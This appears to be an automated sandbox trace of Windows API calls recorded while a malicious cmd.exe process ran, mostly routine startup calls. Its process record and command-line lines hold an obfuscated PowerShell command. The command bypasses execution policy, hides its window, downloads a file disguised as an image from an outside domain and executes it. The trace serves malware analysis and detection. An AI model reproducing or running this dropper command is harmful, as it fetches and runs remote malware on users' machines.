	os_tid = 0xc98


Thread:
	id = 333
	os_tid = 0xcb8


Thread:
	id = 334
	os_tid = 0xcc0


Thread:
	id = 337
	os_tid = 0xcd8


Thread:
	id = 341
	os_tid = 0xce8

	[0124.574] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0150.324] RegCloseKey (hKey=0x32c) returned 0x0
	[0150.324] LocalFree (hMem=0xf38f0) returned 0x0
	[0150.324] CloseHandle (hObject=0x320) returned 1
	[0150.324] CloseHandle (hObject=0x13) returned 1
	[0150.325] CloseHandle (hObject=0xf) returned 1
	[0150.325] RegCloseKey (hKey=0x30c) returned 0x0
	[0150.325] RegCloseKey (hKey=0x308) returned 0x0
	[0150.325] RegCloseKey (hKey=0x304) returned 0x0
	[0150.325] LocalFree (hMem=0xf38c0) returned 0x0
	[0176.998] RegCloseKey (hKey=0x1d0) returned 0x0
	[0209.783] RegCloseKey (hKey=0x35c) returned 0x0
	[0209.783] RegCloseKey (hKey=0x358) returned 0x0
	[0209.783] RegCloseKey (hKey=0x354) returned 0x0
	[0209.783] RegCloseKey (hKey=0x350) returned 0x0
	[0209.784] RegCloseKey (hKey=0x34c) returned 0x0
	[0209.784] RegCloseKey (hKey=0x370) returned 0x0
	[0209.784] RegCloseKey (hKey=0x33c) returned 0x0
	[0209.784] RegCloseKey (hKey=0x338) returned 0x0
	[0209.784] RegCloseKey (hKey=0x334) returned 0x0
	[0209.785] RegCloseKey (hKey=0x330) returned 0x0
	[0209.785] RegCloseKey (hKey=0x32c) returned 0x0
	[0209.785] RegCloseKey (hKey=0x320) returned 0x0
	[0209.785] RegCloseKey (hKey=0x30c) returned 0x0
	[0209.785] RegCloseKey (hKey=0x36c) returned 0x0
	[0209.786] RegCloseKey (hKey=0x1d0) returned 0x0
	[0209.786] RegCloseKey (hKey=0x2e4) returned 0x0
	[0209.786] RegCloseKey (hKey=0x348) returned 0x0
	[0209.786] RegCloseKey (hKey=0x374) returned 0x0
	[0209.786] RegCloseKey (hKey=0x364) returned 0x0
	[0209.787] RegCloseKey (hKey=0x360) returned 0x0
	[0252.939] RegCloseKey (hKey=0x320) returned 0x0
	[0252.939] RegCloseKey (hKey=0x30c) returned 0x0
	[0252.940] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.940] RegCloseKey (hKey=0x1d0) returned 0x0
	[0252.940] RegCloseKey (hKey=0x2e4) returned 0x0
	[0252.940] RegCloseKey (hKey=0x368) returned 0x0
	[0252.940] RegCloseKey (hKey=0x32c) returned 0x0
	[0252.941] RegCloseKey (hKey=0x374) returned 0x0
	[0252.941] RegCloseKey (hKey=0x364) returned 0x0
	[0252.941] RegCloseKey (hKey=0x360) returned 0x0

Thread:
	id = 375
	os_tid = 0xdd4


Process:
	id = "43"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x2adde000"
	os_pid = "0xc6c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "36"
	os_parent_pid = "0x71c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 321
	os_tid = 0xc70

	[0123.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fe50 | out: lpSystemTimeAsFileTime=0x30fe50*(dwLowDateTime=0xc20ad7b0, dwHighDateTime=0x1d543d1)) 
	[0123.894] GetCurrentProcessId () returned 0xc6c
	[0123.894] GetCurrentThreadId () returned 0xc70
	[0123.894] GetTickCount () returned 0x2f4d9
	[0123.894] QueryPerformanceCounter (in: lpPerformanceCount=0x30fe58 | out: lpPerformanceCount=0x30fe58*=24832027162) returned 1
	[0123.896] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0123.896] __set_app_type (_Type=0x1) 
	[0123.896] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0123.896] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0123.896] GetCurrentThreadId () returned 0xc70
	[0123.896] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc70) returned 0x3c
	[0123.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0123.896] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0123.896] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0123.897] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0123.897] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fde8 | out: phkResult=0x30fde8*=0x0) returned 0x2
	[0123.897] VirtualQuery (in: lpAddress=0x30fdd0, lpBuffer=0x30fd50, dwLength=0x30 | out: lpBuffer=0x30fd50*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0123.897] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fd50, dwLength=0x30 | out: lpBuffer=0x30fd50*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0123.897] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fd50, dwLength=0x30 | out: lpBuffer=0x30fd50*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0123.897] VirtualQuery (in: lpAddress=0x214000, lpBuffer=0x30fd50, dwLength=0x30 | out: lpBuffer=0x30fd50*(BaseAddress=0x214000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0123.897] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fd50, dwLength=0x30 | out: lpBuffer=0x30fd50*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0123.897] GetConsoleOutputCP () returned 0x1b5
	[0123.897] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0123.897] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0123.898] _get_osfhandle (_FileHandle=1) returned 0x7
	[0123.898] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0123.898] _get_osfhandle (_FileHandle=1) returned 0x7
	[0123.898] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0123.898] _get_osfhandle (_FileHandle=1) returned 0x7
	[0123.898] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0123.898] _get_osfhandle (_FileHandle=0) returned 0x3
	[0123.898] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0123.898] _get_osfhandle (_FileHandle=0) returned 0x3
	[0123.898] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0123.899] GetEnvironmentStringsW () returned 0x98f20*
	[0123.899] GetProcessHeap () returned 0x80000
	[0123.899] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xad4) returned 0x99a00
	[0123.899] FreeEnvironmentStringsW (penv=0x98f20) returned 1
	[0123.899] GetProcessHeap () returned 0x80000
	[0123.899] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x8) returned 0x987a0
	[0123.899] GetEnvironmentStringsW () returned 0x98f20*
	[0123.899] GetProcessHeap () returned 0x80000
	[0123.899] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xad4) returned 0x9a4e0
	[0123.899] FreeEnvironmentStringsW (penv=0x98f20) returned 1
	[0123.899] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eca8 | out: phkResult=0x30eca8*=0x44) returned 0x0
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x18, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x1, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x1, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x0, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x40, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.899] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x40, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x40, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.900] RegCloseKey (hKey=0x44) returned 0x0
	[0123.900] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eca8 | out: phkResult=0x30eca8*=0x44) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x40, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x1, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x1, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x0, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x9, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x4, lpData=0x30ecc0*=0x9, lpcbData=0x30eca4*=0x4) returned 0x0
	[0123.900] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eca0, lpData=0x30ecc0, lpcbData=0x30eca4*=0x1000 | out: lpType=0x30eca0*=0x0, lpData=0x30ecc0*=0x9, lpcbData=0x30eca4*=0x1000) returned 0x2
	[0123.900] RegCloseKey (hKey=0x44) returned 0x0
	[0123.900] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e8a
	[0123.900] srand (_Seed=0x5d3b2e8a) 
	[0123.900] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0123.900] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0123.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0123.900] GetProcessHeap () returned 0x80000
	[0123.900] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x218) returned 0x98f20
	[0123.900] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x98f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0123.901] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0123.901] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.901] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0123.901] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0123.901] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0123.901] GetProcessHeap () returned 0x80000
	[0123.901] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x99a00 | out: hHeap=0x80000) returned 1
	[0123.901] GetEnvironmentStringsW () returned 0x99140*
	[0123.901] GetProcessHeap () returned 0x80000
	[0123.901] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xaec) returned 0x9bad0
	[0123.901] FreeEnvironmentStringsW (penv=0x99140) returned 1
	[0123.901] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0123.901] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0123.901] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0123.901] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0123.901] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0123.902] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0123.902] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0123.902] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0123.902] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0123.902] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0123.902] GetProcessHeap () returned 0x80000
	[0123.902] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x48) returned 0x98d80
	[0123.902] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fab0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0123.902] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x30fab0, lpFilePart=0x30fa90 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x30fa90*="Documents") returned 0x1b
	[0123.902] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0123.902] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f7c0 | out: lpFindFileData=0x30f7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x9c5d0
	[0123.902] FindClose (in: hFindFile=0x9c5d0 | out: hFindFile=0x9c5d0) returned 1
	[0123.902] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x30f7c0 | out: lpFindFileData=0x30f7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x9c5d0
	[0123.902] FindClose (in: hFindFile=0x9c5d0 | out: hFindFile=0x9c5d0) returned 1
	[0123.902] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x30f7c0 | out: lpFindFileData=0x30f7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x9c5d0
	[0123.902] FindClose (in: hFindFile=0x9c5d0 | out: hFindFile=0x9c5d0) returned 1
	[0123.902] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0123.902] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0123.903] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0123.903] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bad0 | out: hHeap=0x80000) returned 1
	[0123.903] GetEnvironmentStringsW () returned 0x9afd0*
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xb2c) returned 0x9bb10
	[0123.903] FreeEnvironmentStringsW (penv=0x9afd0) returned 1
	[0123.903] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x98d80 | out: hHeap=0x80000) returned 1
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x4016) returned 0x9c650
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x260) returned 0x99c80
	[0123.903] GetProcessHeap () returned 0x80000
	[0123.903] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c650 | out: hHeap=0x80000) returned 1
	[0123.903] GetConsoleOutputCP () returned 0x1b5
	[0123.904] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0123.904] GetUserDefaultLCID () returned 0x409
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fbc0, cchData=128 | out: lpLCData="0") returned 2
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fbc0, cchData=128 | out: lpLCData="0") returned 2
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fbc0, cchData=128 | out: lpLCData="1") returned 2
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0123.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0123.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0123.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0123.905] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0123.905] GetProcessHeap () returned 0x80000
	[0123.905] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x0, Size=0x20c) returned 0x99f60
	[0123.905] GetConsoleTitleW (in: lpConsoleTitle=0x99f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0123.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0123.905] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0123.905] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0123.906] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x4012) returned 0x9c650
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x4010) returned 0xa0670
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x1a) returned 0x949a0
	[0123.906] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x949a0 | out: hHeap=0x80000) returned 1
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xa0670 | out: hHeap=0x80000) returned 1
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x4010) returned 0xa0670
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x1a) returned 0x949a0
	[0123.906] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0123.906] GetProcessHeap () returned 0x80000
	[0123.906] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x949a0 | out: hHeap=0x80000) returned 1
	[0123.907] GetProcessHeap () returned 0x80000
	[0123.907] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xa0670 | out: hHeap=0x80000) returned 1
	[0123.907] GetProcessHeap () returned 0x80000
	[0123.907] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c650 | out: hHeap=0x80000) returned 1
	[0123.907] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0123.907] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0123.907] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0123.908] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0123.908] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0123.908] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0123.908] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0123.908] GetProcessHeap () returned 0x80000
	[0123.908] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xb0) returned 0x9a180
